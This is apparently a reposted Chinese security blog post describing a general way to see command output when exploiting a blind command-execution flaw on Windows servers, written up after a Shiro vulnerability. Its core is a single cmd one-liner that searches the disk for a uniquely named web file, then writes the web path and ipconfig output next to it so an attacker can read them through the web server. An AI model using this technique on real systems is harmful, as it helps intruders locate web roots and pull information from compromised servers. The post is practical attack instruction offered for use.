命令执行漏洞,Windows通用回显方法

命令执行漏洞,Windows通用回显方法

 

来源于公众号:漏洞推送 

原文链接:https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247484560&idx=1&sn=9270d5f637eda78f4796237ba2a04f05&chksm=fe32b467c9453d71be149fa1f65e886b8e6287e99a7fa46411ad51209069a14d520ca9049fc4&mpshare=1&scene=23&srcid=0925cfB2Rnmf1SM9hPI6xIRh&sharer_sharetime=1601005409639&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd

 

最近遇到的了一个shiro的漏洞,无法回显,Java我又不会,所以找到了一个比较通用的回显方法,唯一的条件就是需要有web服务,还需要一个名称唯一的静态资源名。

 

web目录如下所示

 

执行命令如下:

cmd /c "for /f %i in ('dir /s /b d:a.php') do (echo %i> %i.path.txt)&(ipconfig > %i.ipconfig.txt)"

 

 

要注意修改红框所在的d,如果web路径是在c盘就修改为c,不知道的话,就一个个慢慢试。

 

命令执行成功以后

a.php.ipconfig.txt为回显结果

a.php.path.txt为web路径

 

posted @ 2020-09-25 13:46  Xor0ne  阅读(463)  评论(0)    收藏  举报